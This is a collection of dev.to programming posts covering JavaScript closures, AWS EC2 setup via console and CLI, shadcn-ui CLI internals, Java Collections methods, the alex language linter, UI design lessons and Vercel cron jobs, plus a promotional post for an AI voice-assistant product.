```javascript
function createCounter() {
let count = 0;
return {
increment: function() {
count++;
console.log(count);
},
decrement: function() {
count--;
console.log(count);
},
getCount: function() {
return count;
}
};
}
const counter = createCounter();
counter.increment(); // Outputs: 1
counter.increment(); // Outputs: 2
counter.decrement(); // Outputs: 1
console.log(counter.getCount()); // Outputs: 1
```
In this example:
- `createCounter` function defines a variable `count` and returns an object with three methods: `increment`, `decrement`, and `getCount`.
- The methods `increment` and `decrement` modify `count`, while `getCount` returns its current value.
- The `count` variable is private to `createCounter` and cannot be accessed directly from outside. This encapsulation is made possible by closures.
## Real-World Example: Delayed Execution
Closures are also useful for functions that need to remember the context in which they were created, such as setting up delayed execution with `setTimeout`:
```javascript
function greet(name) {
return function() {
console.log('Hello, ' + name);
};
}
const delayedGreeting = greet('Alice');
setTimeout(delayedGreeting, 2000); // Outputs: Hello, Alice after 2 seconds
```
In this example:
- `greet` function returns another function that logs a greeting message.
- `delayedGreeting` stores the returned function with the captured `name` variable.
- `setTimeout` executes `delayedGreeting` after 2 seconds, and it still has access to `name` (Alice) due to the closure.
## Conclusion
Closures are a fundamental concept in JavaScript that allow functions to access their lexical scope even after the outer function has finished executing. They enable powerful patterns such as data encapsulation, private variables, and delayed execution.
### And Finally,
Please don’t hesitate to point out any mistakes in my writing and any errors in my logic.
I’m appreciative that you read my piece. | readwanmd |
1,917,806 | AWS EC2: Creating, Connecting and Managing Your Instances | If you have read the last article, you must have some idea about an EC2 instance. Amazon EC2... | 27,845 | 2024-07-09T20:45:22 | https://dev.to/ansumannn/aws-ec2-creating-connecting-and-managing-your-instances-3efg | aws, cloud, ec2, devops | If you have read the last article, you must have some idea about an EC2 instance. Amazon EC2 instances are basically virtual machines but in the cloud. This guide will walk you through creating your EC2 instance, securely connecting to it via SSH, and managing it effortlessly using the AWS Command Line Interface (CLI). But before that here are some features of EC2:
### Features of AWS EC2
* **Flexibility**: Choose from a wide range of instance types with varying CPU, memory, storage, and networking capabilities.
* **Scalability**: Easily scale up or down based on demand, ensuring optimal performance and cost efficiency.
* **Security**: Control access with security groups and manage authentication using key pairs for secure SSH access.
* **Integration**: Seamlessly integrates with other AWS services like S3, RDS, and VPC for comprehensive cloud solutions.
* **Cost Management**: Pay only for the resources you use with flexible pricing options and cost-effective billing.
AWS offers 12 months of free tier access to every new user. So if you want to experiment with it, go ahead, but be aware about the billing cycles. Amazon EC2 empowers businesses and developers to deploy applications quickly and efficiently, making it a cornerstone of cloud computing infrastructure. Now lets get started.
### Creating Your EC2 Instance
#### Step 1: Select an AMI
Think of the Amazon Machine Image (AMI) as your instance’s operating system. Here’s how to get started:
* **Visit the EC2 Dashboard**: Log in to AWS and go to the EC2 Dashboard.
* **Create Your Instance**: Click on "Launch Instance" and choose an AMI. Popular choices include Amazon Linux and Ubuntu.
#### Step 2: Select the Instance Type
Choose the instance type that best fits your needs. For example, `t2.micro` is great for testing and small applications. Be careful here and only select the ones with free tier eligible tags or you will be charged for it.
* **Select Instance Type**: Pick the hardware configuration that matches your workload.
#### Step 3: Create Key Pair
Create a key pair that will be used to connect to the EC2 instance. So save it somewhere safe.
* **Generate Keypair and save it**: This will be used to securely connect to your EC2 instance.
#### Step 4: Configure Networking and Add Storage
Set up networking, storage, and any additional configurations. If you are just getting started, you can keep it as default and move on.
* **Configure Instance Details**: Decide on networking settings and add storage as needed.
#### Step 5: Launch Your Instance
Review your configuration and launch your instance. Don’t forget to create or select a key pair for SSH access.

### Connecting to Your EC2 Instance via SSH
Now that your instance is up and running, it’s time to connect to it securely:
1. **Prepare Your Key Pair**: Have your `.pem` key pair file ready.
Modify permissions in order to execute
```chmod 600 keypair.pem```
3. **Connect via SSH**:
Find your instance’s Public DNS (IPv4) in the EC2 Dashboard.
Use SSH to connect.
ssh -i /path/to/key-pair.pem ubuntu@<Public-IP-Address>


### Managing EC2 Instances with AWS CLI
Harness the power of AWS CLI to manage your EC2 instances efficiently:
1. **Install and Configure AWS CLI**: If not already installed, set up AWS CLI with your AWS credentials.
2. **Launch an Instance**: Use a single command to launch an instance:
```bash
aws ec2 run-instances \
--image-id ami-0a0e5d9c7acc336f1 \
--count 1 \
--instance-type t2.micro \
--key-name MyKeyPairName \
--security-group-ids sg-0a49d3aa3grs60 \
--subnet-id subnet-05617gfhu90a934c1e
```

3. **Check Instance Status**:
```bash
aws ec2 describe-instances --instance-ids i-009ee048cd14619de
```
4. **Terminate an Instance**:
```bash
aws ec2 terminate-instances --instance-ids i-009ee048cd14619de
```
### Conclusion
So with that we now have basic understanding of how to create an EC2 instance both through UI and through CLI, connecting to EC2 instances and managing the instances. This Knowledge will be helpful whether you are on a DevOps track or trying to learn about AWS in general. I will share more about AWS as I learn more about it. See you in the next one. | ansumannn |
1,917,807 | Unlocking the Power of React Conversational Agents with Sista AI | Unleash the potential of React conversational agents with Sista AI. Revolutionize user interactions and enhance engagement seamlessly! 🌐✨ | 0 | 2024-07-09T20:45:39 | https://dev.to/sista-ai/unlocking-the-power-of-react-conversational-agents-with-sista-ai-5cmd | ai, react, javascript, typescript | <h2>Introduction</h2><p>The integration of AI assistants into React applications has become a hot topic among developers. Rising demands for enhanced user engagement and accessibility have paved the way for cutting-edge solutions like <strong>Sista AI</strong>. This article delves into the transformative capabilities of React conversational agents and how Sista AI is revolutionizing user interactions.</p><h2>Empowering User Engagement</h2><p>Sista AI offers a revolutionary platform that transforms any app into a smart app with a voice assistant in less than 10 minutes. By leveraging state-of-the-art conversational AI agents, Sista AI guarantees precise responses and an intuitive user experience. Developers can seamlessly integrate AI voice assistants into React apps, enhancing engagement and accessibility.</p><h2>Enhanced User Experience and Accessibility</h2><p>The AI voice assistant supports over 40 languages, ensuring a dynamic and engaging experience for a global audience. With hands-free UI interactions enabled by the multi-tasking UI controller, users can navigate their apps effortlessly. Real-time data integration and personalized customer support further enhance the app's functionality and user satisfaction.</p><h2>Applications Across Industries</h2><p>Sista AI's AI-powered solutions transcend industry boundaries, providing benefits across various sectors, from e-commerce to healthcare. By embracing AI technology, businesses can boost user engagement, streamline operations, and deliver personalized experiences to their customers.</p><h2>The Future of Human-Computer Interaction</h2><p>As the digital landscape evolves, AI integration is poised to redefine human-computer interaction. Sista AI's innovative solutions empower developers to create smarter and more intuitive apps that cater to diverse user needs. By embracing AI-driven interactions, businesses can stay ahead of the curve and offer seamless experiences to their users.</p><br/><br/><a href="https://smart.sista.ai?utm_source=sista_blog_devto&utm_medium=blog_post&utm_campaign=big_logo" target="_blank"><img src="https://vuic-assets.s3.us-west-1.amazonaws.com/sista-make-auto-gen-blog-assets/sista_ai.png" alt="Sista AI Logo"></a><br/><br/><p>For more information, visit <a href="https://smart.sista.ai?utm_source=sista_blog_devto&utm_medium=blog_post&utm_campaign=For_More_Info_Banner" target="_blank">sista.ai</a>.</p> | sista-ai |
1,917,808 | What_happens_when_your_type_google_com_in_your_browser_and_press_enter | This diagram illustrates the key steps involved in the request flow: DNS Resolution : The browser... | 0 | 2024-07-09T20:47:55 | https://dev.to/mongezi_sibande_d8869a238/whathappenswhenyourtypegooglecominyourbrowserandpressenter-1b5a |

**_This diagram illustrates the key steps involved in the request flow:_**
1. DNS Resolution
: The browser performs a DNS lookup to resolve the hostname www.google.com to an IP address.
Firewall: The encrypted HTTPS request from the browser passes through the firewall.
2. Load Balancer: The load balancer receives the encrypted request and distributes it to an available web server.
3. Web Server: The web server forwards the request to the application server.
4. Application Server: The application server fetches data from the database as needed to generate the web page.
5. Database: The application server queries the database to retrieve the necessary data.
6. Web Page Generation: The application server generates the web page and returns it to the web server.
7. Response Flow: The web page is then passed back through the load balancer, firewall, and finally to the browser.
##
This schema provides a high-level overview of the request flow, including the key components involved (DNS server, firewall, load balancer, web server, application server, and database) and the encryption of the traffic between the browser and the web server. | mongezi_sibande_d8869a238 | |
1,917,809 | shadcn-ui/ui codebase analysis: How does shadcn-ui CLI work? — Part 2.9 | I wanted to find out how shadcn-ui CLI works. In this article, I discuss the code used to build the... | 0 | 2024-07-09T20:48:40 | https://dev.to/ramunarasinga/shadcn-uiui-codebase-analysis-how-does-shadcn-ui-cli-work-part-29-4p37 | javascript, nextjs, shadcnui, opensource | I wanted to find out how shadcn-ui CLI works. In this article, I discuss the code used to build the shadcn-ui/ui CLI.
In part 2.8, we looked at function promptForMinimalConfig and its parameters and how the shadcn-ui CLI uses chalk to highlight text in the terminal.
This is a continuation to 2.8, we will look at below concepts in this article.
1. getRegistryStyles function
2. fetchRegistry function
3. stylesSchema

getRegistryStyles function:
---------------------------
getRegistryStyles is imported from [utils/registry/index.tsx](https://github.com/shadcn-ui/ui/blob/main/packages/cli/src/utils/registry/index.ts#L29).
```js
export async function getRegistryStyles() {
try {
const \[result\] = await fetchRegistry(\["styles/index.json"\])
return stylesSchema.parse(result)
} catch (error) {
throw new Error(\`Failed to fetch styles from registry.\`)
}
}
```
This function fetches the styles registry and parses the result using styles schema.
fetchRegistry function:
-----------------------
getRegistryStyles calls fetchRegistry function with a paramter \[“styles/index.json”\]. Why is the parameter being an array?
```js
async function fetchRegistry(paths: string\[\]) {
try {
const results = await Promise.all(
paths.map(async (path) => {
const response = await fetch(\`${baseUrl}/registry/${path}\`, {
agent,
})
return await response.json()
})
)
return results
} catch (error) {
console.log(error)
throw new Error(\`Failed to fetch registry from ${baseUrl}.\`)
}
}
```
Notice how the parameter is an array of strings. Because fetchRegistry uses Promise.all and fetches based on path looping through the paths using map. Navigate to [https://ui.shadcn.comstyles/index.json](https://ui.shadcn.comstyles/index.json), you will find that the below json is fetched when the getRegistryStyles is called.

stylesSchema
------------
stylesSchema is rather a simple schema with just name and label.
```js
export const stylesSchema = z.array(
z.object({
name: z.string(),
label: z.string(),
})
)
```
Conclusion:
-----------
In this article, I discussed the following concepts:
1. getRegistryStyles function
getRegistryStyles is imported from [utils/registry/index.tsx](https://github.com/shadcn-ui/ui/blob/main/packages/cli/src/utils/registry/index.ts#L29). This function fetches the styles registry and parses the result using styles schema.
2\. fetchRegistry function
getRegistryStyles calls fetchRegistry function with a paramter \[“styles/index.json”\].
Why is the parameter being an array? Because fetchRegistry uses Promise.all and fetches based on path looping through the paths using map. Navigate to [https://ui.shadcn.comstyles/index.json](https://ui.shadcn.comstyles/index.json), you will find the styles related json that is fetched when the getRegistryStyles is called.
3\. stylesSchema
stylesSchema is a rather simple schema with just name and label.
```js
export const stylesSchema = z.array(
z.object({
name: z.string(),
label: z.string(),
})
)
```
> _Want to learn how to build shadcn-ui/ui from scratch? Check out_ [_build-from-scratch_](https://tthroo.com/)
About me:
---------
Website: [https://ramunarasinga.com/](https://ramunarasinga.com/)
Linkedin: [https://www.linkedin.com/in/ramu-narasinga-189361128/](https://www.linkedin.com/in/ramu-narasinga-189361128/)
Github: [https://github.com/Ramu-Narasinga](https://github.com/Ramu-Narasinga)
Email: [ramu.narasinga@gmail.com](mailto:ramu.narasinga@gmail.com)
[Build shadcn-ui/ui from scratch](https://tthroo.com/)
References:
-----------
1. [https://github.com/shadcn-ui/ui/blob/main/packages/cli/src/utils/registry/index.ts#L29](https://github.com/shadcn-ui/ui/blob/main/packages/cli/src/utils/registry/index.ts#L29)
2. [https://github.com/shadcn-ui/ui/blob/main/packages/cli/src/utils/registry/index.ts#L139](https://github.com/shadcn-ui/ui/blob/main/packages/cli/src/utils/registry/index.ts#L139)
3. [https://github.com/shadcn-ui/ui/blob/main/packages/cli/src/utils/registry/schema.ts#L26](https://github.com/shadcn-ui/ui/blob/main/packages/cli/src/utils/registry/schema.ts#L26) | ramunarasinga |
1,917,810 | Software engineering principles cheat sheet | The software engineering principles cheat sheet I would give to myself If I was preparing for... | 0 | 2024-07-09T20:49:16 | https://dev.to/msnmongare/software-engineering-principles-cheat-sheet-3lpn | softwaredevelopment, javascript, beginners, webdev | The software engineering principles cheat sheet I would give to myself If I was preparing for technical interviews again
**🟠 ACID Properties**
1. Atomicity: Transactions are all-or-nothing, fully completed, or not.
2. Consistency: Transactions ensure the database remains in a valid state.
3. Isolation: Transactions operate independently, unaffected by others.
4. Durability: Completed transactions are permanently recorded despite failures.
**🟠SOLID Principles**
1. Single Responsibility: Limit each class to a single responsibility.
2. Open/Closed: Classes should be open for extension but closed for modification.
3. Liskov Substitution: Subclasses should be substitutable for their base classes.
4. Interface Segregation: Prefer small, focused interfaces over broad ones.
5. Dependency Inversion: Rely on abstractions rather than concrete implementations.
**🟠Design Patterns:**
1. Factory Method: Create objects without specifying the exact class.
2. Abstract Factory: Create families of related objects without specifying their concrete classes.
3. Builder: Construct complex objects through a series of steps.
4. Prototype: Copy existing objects without knowing the specifics of their construction.
5. Singleton: Ensure a class has only one instance with a global point of access.
6. Adapter: Enable cooperation between incompatible interfaces.
7. Bridge: Decouple an abstraction from its implementation.
8. Composite: Organize objects into tree structures to represent part-whole hierarchies.
9. Decorator: Add responsibilities to objects dynamically.
10. Facade: Provide a simple interface to a complex system.
11. Flyweight: Reduce the cost of creating and managing many similar objects.
12. Proxy: Control access to another object, handling expensive or complex operations.
13. Command: Encapsulate a request as an object, allowing parameterization and queuing.
**🟠 System Design Principles**
1. Scalability: Design systems to handle growth in users and data smoothly.
2. Performance: Optimize response times and resource utilization.
3. Reliability: Ensure the system functions correctly and consistently.
4. Availability: Design for near-constant operability.
5. Security: Safeguard systems against unauthorized access and vulnerabilities.
6. Maintainability: Facilitate updates and maintenance with minimal disruption.
7. Modularity: Build components that can be updated independently.
8. Reusability: Design for components to be reused across different parts of the system.
9. Decomposability: Break down complex processes into simpler, manageable parts.
10. Concurrency: Design interactions to handle multiple operations simultaneously without conflict. | msnmongare |
1,917,812 | Static Methods for Lists and Collections | The Collections class contains static methods to perform common operations in a collection and a... | 0 | 2024-07-09T21:12:05 | https://dev.to/paulike/static-methods-for-lists-and-collections-4h9j | java, programming, learning, beginners | The **Collections** class contains static methods to perform common operations in a collection and a list. [The section](https://dev.to/paulike/useful-methods-for-lists-eol) introduced several static methods in the **Collections** class for array lists. The **Collections** class contains the **sort**, **binarySearch**, **reverse**, **shuffle**, **copy**, and **fill** methods for lists, and **max**, **min**, **disjoint**, and **frequency** methods for collections, as shown in Figure below.

You can sort the comparable elements in a list in its natural order with the **compareTo** method in the **Comparable** interface. You may also specify a comparator to sort elements. For example, the following code sorts strings in a list.
`List<String> list = Arrays.asList("red", "green", "blue");
Collections.sort(list);
System.out.println(list);`
The output is `[blue, green, red]`.
The preceding code sorts a list in ascending order. To sort it in descending order, you can simply use the **Collections.reverseOrder()** method to return a **Comparator** object that orders the elements in reverse of their natural order. For example, the following code sorts a list of strings in descending order.
`List<String> list = Arrays.asList("yellow", "red", "green", "blue");
Collections.sort(list, Collections.reverseOrder());
System.out.println(list);`
The output is `[yellow, red, green, blue]`.
You can use the **binarySearch** method to search for a key in a list. To use this method, the list must be sorted in increasing order. If the key is not in the list, the method returns -(_insertion point_ +1). Recall that the insertion point is where the item would fall in the list if it were present. For example, the following code searches the keys in a list of integers and a list of strings.
`List<Integer> list1 = Arrays.asList(2, 4, 7, 10, 11, 45, 50, 59, 60, 66);
System.out.println("(1) Index: " + Collections.binarySearch(list1, 7));
System.out.println("(2) Index: " + Collections.binarySearch(list1, 9));`
`List<String> list2 = Arrays.asList("blue", "green", "red");
System.out.println("(3) Index: " +
Collections.binarySearch(list2, "red"));
System.out.println("(4) Index: " +
Collections.binarySearch(list2, "cyan"));`
The output of the preceding code is:
`(1) Index: 2
(2) Index: -4
(3) Index: 2
(4) Index: -2`
You can use the **reverse** method to reverse the elements in a list. For example, the following code displays **[blue, green, red, yellow]**.
`List<String> list = Arrays.asList("yellow", "red", "green", "blue");
Collections.reverse(list);
System.out.println(list);`
You can use the **shuffle(List)** method to randomly reorder the elements in a list. For example, the following code shuffles the elements in **list**.
`List<String> list = Arrays.asList("yellow", "red", "green", "blue");
Collections.shuffle(list);
System.out.println(list);`
You can also use the **shuffle(List, Random)** method to randomly reorder the elements in a list with a specified Random object. Using a specified Random object is useful to generate a list with identical sequences of elements for the same original list. For example, the following code shuffles the elements in **list**.
`List<String> list1 = Arrays.asList("yellow", "red", "green", "blue");
List<String> list2 = Arrays.asList("yellow", "red", "green", "blue");
Collections.shuffle(list1, new Random(20));
Collections.shuffle(list2, new Random(20));
System.out.println(list1);
System.out.println(list2);`
You will see that **list1** and **list2** have the same sequence of elements before and after the shuffling.
You can use the **copy(det, src)** method to copy all the elements from a source list to a destination list on the same index. The destination list must be as long as the source list. If it is longer, the remaining elements in the source list are not affected. For example, the following
code copies **list2** to **list1**.
`List<String> list1 = Arrays.asList("yellow", "red", "green", "blue");
List<String> list2 = Arrays.asList("white", "black");
Collections.copy(list1, list2);
System.out.println(list1);`
The output for **list1** is `[white, black, green, blue]`. The **copy** method performs a shallow copy: only the references of the elements from the source list are copied.
You can use the **nCopies(int n, Object o)** method to create an immutable list that consists of **n** copies of the specified object. For example, the following code creates a list with five **Calendar** objects.
`List<GregorianCalendar> list1 = Collections.nCopies(5, new GregorianCalendar(2005, 0, 1));`
The list created from the **nCopies** method is immutable, so you cannot add, remove, or update elements in the list. All the elements have the same references.
You can use the **fill(List list, Object o)** method to replace all the elements in the list with the specified element. For example, the following code displays `[black, black, black]`.
`List<String> list = Arrays.asList("red", "green", "blue");
Collections.fill(list, "black");
System.out.println(list);`
You can use the **max** and **min** methods for finding the maximum and minimum elements in a collection. The elements must be comparable using the **Comparable** interface or the **Comparator** interface. For example, the following code displays the largest and smallest strings in a collection.
`Collection<String> collection = Arrays.asList("red", "green", "blue");
System.out.println(Collections.max(collection));
System.out.println(Collections.min(collection));`
The **disjoint(collection1, collection2)** method returns **true** if the two collections have no elements in common. For example, in the following code, **disjoint(collection1, collection2)** returns **false**, but **disjoint(collection1, collection3)** returns **true**.
`Collection<String> collection1 = Arrays.asList("red", "cyan");
Collection<String> collection2 = Arrays.asList("red", "blue");
Collection<String> collection3 = Arrays.asList("pink", "tan");
System.out.println(Collections.disjoint(collection1, collection2));
System.out.println(Collections.disjoint(collection1, collection3));`
The **frequency(collection, element)** method finds the number of occurrences of the element in the collection. For example, **frequency(collection, "red")** returns **2** in the following code.
`Collection<String> collection = Arrays.asList("red", "cyan", "red");
System.out.println(Collections.frequency(collection, "red"));`
| paulike |
1,917,813 | Practicing politeness in JavaScript code 🤬 | Imagine that you published a big open source project and many people are currently changing your code... | 0 | 2024-07-09T21:52:29 | https://dev.to/silentwatcher_95/practicing-politeness-in-javascript-code-535g | javascript, node, tutorial, learning | Imagine that you published a big open source project and many people are currently changing your code or updating the project documents.
what if someone accidently write something race related , gender favoring , polarizing and etc... 👀

we have a tool called **alex** !
According to what is written in the [documentation ](https://github.com/get-alex/alex) of this tool:
> Whether your own or someone else’s writing, alex helps you find gender favoring, polarizing, race related, or other unequal phrasing in text.
## Set up Alex in our project
in order to use alex inside our project , first we need to install its package.
it will be a good practice if you install alex as a dev-dependency
or you can just install it globally in your system.
```bash
npm i -D alex
```
Alex reads plain text, HTML, MDX, or markdown as input.
One of its uses is to scan all project documents for any literary issues.
Let’s assume that all our documents are written in Markdown format, so we instruct Alex to check all files with a .md extension
In our package.json file, we can create a script like:
```json
{
"scripts": {
"test-doc" : "npx alex *.md"
}
```
After that, I create a file called policy.md as an example document:
```md
## the boogeyman walked to class
```
if you run the **test-doc** command, you will probably get this result:
```bash
> test-doc
> npx alex *.md
policy.md
1:8-1:17 warning `boogeyman` may be insensitive, use `boogeymonster` instead boogeyman-boogeywoman retext-equality
‼ 1 warning
```
You can use this command together with tools such as **Husky ** and **lint-staged** to run the process of checking your files automatically. 🤖
What are your thoughts on this tool, and how crucial is compliance with this matter for software projects? 🧐🤗
| silentwatcher_95 |
1,917,814 | 12 Lessons for a better UI - Refactoring UI The Book | Hello everyone, I'm Juan, and today I want to share some of the things that I've learned while... | 0 | 2024-07-09T21:16:44 | https://dev.to/juanemilio31323/12-lessons-for-a-better-ui-refactoring-ui-the-book-4ea1 | frontend, ui, ux, webdev | Hello everyone, I'm Juan, and today I want to share some of the things that I've learned while reading [Refactoring UI](https://www.refactoringui.com/). It's amazing how much you can learn from the right book.
Not so long ago, I started working on a new project of my own, and to my surprise, I found myself trapped and blocked with the UI that I was designing. I couldn't decide on colors, sizes—basically anything important for a UI was escaping me. So I decided to do what I always do when I don't know how to proceed: find a book that I think has the answer to my problem. Worst case scenario, I'll learn something new. To my surprise, _Refactoring UI_ wasn't just the solution I was looking for; it also rekindled my interest in UI design. So if you need something like that, prepare yourself, because we are going to check out the most disruptive and interesting lessons I learned from this book.
From now on, I invite you to check out the book and buy it because there's no waste. With that said, let's proceed.
## 1 - Do It and Do It Fast
Probably the reason why this lesson struck me as so interesting is because lately, I've been talking and [writing](https://medium.com/@theprof301/48hs-is-all-you-need-15083345c5d5) nonstop about the importance of finishing a project before obsessing over the details.
> In the earliest stages of designing a new feature, it’s important that you don’t get hung up making low-level decisions about things like typefaces, shadows, icons, etc.
\ - Page 10
I found this reaffirming, and not only that, but the book proposes an exercise to make this process even easier. Take a sharpie and draw on paper; it's really hard to obsess over the details.
## 2 - Not the Layout but Instead the Feature
What is an app? Try to come up with an answer before moving on. An app is a collection of features, at least that's what _Refactoring UI_ tells us:
> The thing is, an “app” is actually a collection of features...
\ - Page 7
This answer was a breakthrough for me. It made perfect sense—we are designing an app, not a layout. So we shouldn't waste so much time starting the house by the roof because the details will be clearer once we have a collection of features to fill that layout.
> The easiest way to find yourself frustrated and stuck when working on a new design is to start by trying to “design the app.” When most people think about “designing the app,” they’re thinking about the shell.
\ - Page 7
## 3 - First in Scale of Grays
This is something that most of us probably know but ignore, I don't know why.
We are still in chapter one, and the book keeps telling us to stop worrying so much about things that can be polished once the features are ready. The aspect that we are "neglecting" now is **color**, and I couldn't feel more at peace about it. I can't even count how many times I found myself stressing over the colors of my application. So instead of spending so much time thinking about the colors, the book suggests developing the features in a scale of grays, always keeping in mind the hierarchy that we are transmitting with contrast, size, and space.
## 4 - Get Some Personality
> Every design has some sort of personality. A banking site might try to communicate secure and professional, while a trendy new startup might have a design that feels fun and playful.
\ - Page 17
This is something we normally underestimate, forgetting to choose a personality before starting to design. In my case, the application I am currently working on wasn't looking quite right; it didn't have any personality. Finally, I decided to go for something formal, conveying that characteristic sense of "We know what we are talking about."

It's still a work in progress.
## 5 - Systematize Everything
> The more systems you have in place, the faster you’ll be able to work, and the less you’ll second-guess your own decisions.
\ - Page 27
How many times have you found yourself asking: "What size should this be?" or maybe repeating a decision over and over again? The book strongly encourages us to develop following a system. I might add that a good solution to avoid falling into the complicated task of creating your own system is to copy someone else's system, like the one Tailwind is using.
## 6 - What's the Priority?
Have you felt that you don't know why your UI seems flat? I've asked myself that many times. I used to think it was because of the lack of animation in my app, so I added animations. That didn't solve it, so I thought it was the color scheme; it wasn't. This book gave me the answer:
> Visual hierarchy refers to how important the elements in an interface appear in relation to one another, and it’s the most effective tool you have for making something feel “designed.”
\ - Page 30
There you have the answer: visual hierarchy, reducing the noise in our design, helping the user to pay attention to what is most important on the screen. Playing with contrast, color, size, and space—those are our tools to achieve it.
## Before moving on
If you are enjoying my content or find it useful, give me a follow and leave me a comment or like—that's always helpful. I don't want to stop you, so enjoy the post, and thanks for reading.
## 7 - Don’t Use Gray Text on Colored Backgrounds
I've included this because it is an error that I used to make when trying to create hierarchy in my UI.
> Making the text closer to the background color is what actually helps create hierarchy, not making it light gray.
\ - Page 37
Just a little hint, worth mentioning.


## 8 - Balance Weight and Contrast
Have you ever noticed that when you add an icon to your app, especially the ones that are filled, they jump out of the screen? Well, that's because the icon is covering more surface in the same amount of space because it uses the empty space inside it. This can break your hierarchy, and as we saw before, it is probably the most important aspect for a UI in order to look "designed."
To avoid this happening, we are going to reduce the contrast with the background by changing the color of the icon to a closer color to the background.


## 9 - Start with Too Much Space and Go Down
> One of the easiest ways to clean up a design is to simply give every element a little more room to breathe.
\ - Page 56
It may sound absurd, but every time you start to design something, add a little bit more space than you would initially. For example, normally I start with padding-4 on Tailwind; now I'm starting with padding-8.
Increase your gap, increase your padding, and increase your margin. Later, you can go down, but let's start with more empty space.

## 10 - How Much Width Do You Need?
I love designing for mobile—it's much easier, less space, less content. Just properly position your items on the screen, and everything works perfectly. Try to take that same approach to desktop, and surprise, surprise, your application feels strange.
The book gives us a solution:
> If you only need 600px, use 600px. Spreading things out or making things unnecessarily wide just makes an interface harder to interpret, while a little extra space around the edges never hurt anyone.
\ - Page 65
In the same way, just because you shrink your canvas doesn't mean that everything has to behave that way. You might use full width on your navbar, but shrink your dashboard. Play with combining these ideas and remember:
> Instead of sizing elements like this based on a grid, give them a max-width so they don’t get too large, and only force them to shrink when the screen gets smaller than that max-width.
\ - Page 77
## 11 - Hide Actions for Data the User Hasn't Created
Another thing that may be obvious but that at least in my case, I always forgot to take into consideration. Let me show you something from my application again:

This is the customers' dashboard on mobile, and this is what's going to be displayed once the user loads data. But what is he going to see if there is no data?

Not that pretty, right? But that's the default state of the application. What do you say if we contemplate this state?

Much better. That's basically what the book is telling us to do—contemplate these little but important states.
## 12 - Use Fewer Borders
> When you need to create separation between two elements, try to resist immediately reaching for a border.
\ - Page 206
Using borders can add noise to the UI, something that we are trying to avoid. So instead of adding borders, a better approach would be:
> What better way to create separation between elements than to simply increase the separation?
\ - Page 209
That extra space automatically causes the visual effect of differentiation between elements.


## Wrapping Up
I hope you find this post useful. This was an exercise for myself, trying to summarize a 300-page book into the things that were most helpful for me. Originally, this post was going to have 25 lessons, but I think it's better if I leave it at just 12 lessons because these are the most helpful, at least for me.
Once again, I invite you to buy the book because it has a lot more information and beautiful examples than the ones I mentioned here. So please take a [look](https://www.refactoringui.com/).
## Before You Go
Thank you for reading, and if you really enjoyed the post, would you help me pay my rent?
[---------------------------------------------------------------------------] 0% of $400, [let's pay my rent](https://buymeacoffee.com/juanemilio) | juanemilio31323 |
1,917,816 | Automate the tasks using Vercel Cron Jobs | Cron Jobs are commands that run automatically at specific time intervals (e.g. daily, weekly,... | 0 | 2024-07-09T21:23:38 | https://dev.to/onurhandtr/automate-the-tasks-using-vercel-cron-jobs-ieh | vercel, nextjs, typescript, cronjobs | Cron Jobs are commands that run automatically at specific time intervals (e.g. daily, weekly, hourly).
The Cron job feature can be used for operations performed at specific intervals such as data synchronization, email sending, backup operations, and more.
Vercel, on the other hand, hosts the Cron Jobs feature on its platform and offers space to manage and run them.
### How to Use
Vercel has prepared a comprehensive [document](https://vercel.com/docs/cron-jobs/manage-cron-jobs) on this topic. You can get more detailed information about how to create and manage it.
In this article, I will talk step by step about how I use Cron Jobs in my [Lotus](https://github.com/onurhan1337/lotus) project.
### Configuration
First, I create a **vercel.json** file in the main directory of the project. In this file, we will specify the relevant API route path information and frequency.
The Lotus project contains challenges and each of them has end dates. I set the frequency for each new day so that the challenge status information is updated when the end date arrives.
```json
{
"crons": [
{
"path": "/api/cron",
"schedule": "0 0 * * *"
}
]
}
```
The values next to Schedule may seem meaningless, but they are used to specify the frequency. The value in the code fragment above means once every 24 hours. Below you can view other examples shared in the document.

Also, if the interval you want to set is not listed, you can easily find out the corresponding time interval by accessing the relevant document page from the [link](https://vercel.com/docs/cron-jobs) here and using the Cron job validator feature.

### Just use it
After the configuration phase, all we need to do is to create a file in the API route we specified in the vercel.json file and then write the process file we want into it.
In the Vercel document, examples are [given](https://vercel.com/docs/cron-jobs/quickstart) for this using the World Time API, Serverless and Edge functions are supported.
```ts
// app/api/cron/route.ts
export async function GET() {
const result = await fetch(
'http://worldtimeapi.org/api/timezone/America/Chicago',
{
cache: 'no-store',
},
);
const data = await result.json();
return Response.json({ datetime: data.datetime });
}
```
### Securing cron jobs
You can secure cron jobs by assigning the **CRON_SECRET** environment key. Vercel recommends using a random password of 16 characters for this.
Then this defined key is automatically sent with the header as Authorization information when a Vercel cron job is called.
```ts
import type { NextRequest } from 'next/server';
export function GET(request: NextRequest) {
const authHeader = request.headers.get('authorization');
if (authHeader !== `Bearer ${process.env.CRON_SECRET}`) {
return new Response('Unauthorized', {
status: 401,
});
}
return Response.json({ success: true });
}
```
### Limitations
You don’t need a Pro plan to use the Cron Jobs feature, but if you want to use it more extensively, you should take a look at the [limitations](https://vercel.com/docs/cron-jobs/usage-and-pricing).

### Deploy
You can either use it via Vercel CLI with the command below or by committing the changes to GitHub and then redeploying.
```bash
$ vercel deploy --prod
```
### Cron Jobs in Lotus
Cron Jobs has many options such as dynamic routes and secure requests, but my needs in this regard were more limited. So I set it to trigger once every 24 hours, as shown in the vercel.json file I shared above.
Then I created an API route. First, I got the currentDate information and used Prisma’s LTE feature and currentDate information to find the challenges that are active and whose deadline is before or equal to today.
```ts
import prisma from "@/lib/prisma";
import { NextResponse } from "next/server";
export async function GET() {
try {
const currentDate = new Date();
const expiredChallenges = await prisma.challenge.findMany({
where: {
endDate: {
lte: currentDate,
},
isActive: "ACTIVE",
},
});
if (expiredChallenges.length === 0) {
return NextResponse.json({
message: "No expired challenges found",
});
}
return NextResponse.json({
message: "Expired challenges updated",
});
catch (error: any) {
return NextResponse.json({
message: "Error updating challenges.",
error: error.message,
});
}
}
```
Since I only needed the ID information, I defined an array and extracted the **expiredChallenges**.
Then I updated the isActive property of each one to **COMPLETED** using Prisma’s updateMany property.
```ts
const expiredChallengeIds = expiredChallenges.map(
(challenge) => challenge.id
);
await prisma.challenge.updateMany({
where: {
id: {
in: expiredChallengeIds,
},
},
data: {
isActive: "COMPLETED",
},
});
```
### Manage Cron Jobs
You can come to the settings page of the project via the Vercel dashboard, click on Cron Jobs and then view it. You can review the logs or run manually to test them.

Thank you for reading my article. Follow me on [X](https://x.com/onurhan1337).
https://buymeacoffee.com/onurhan | onurhandtr |
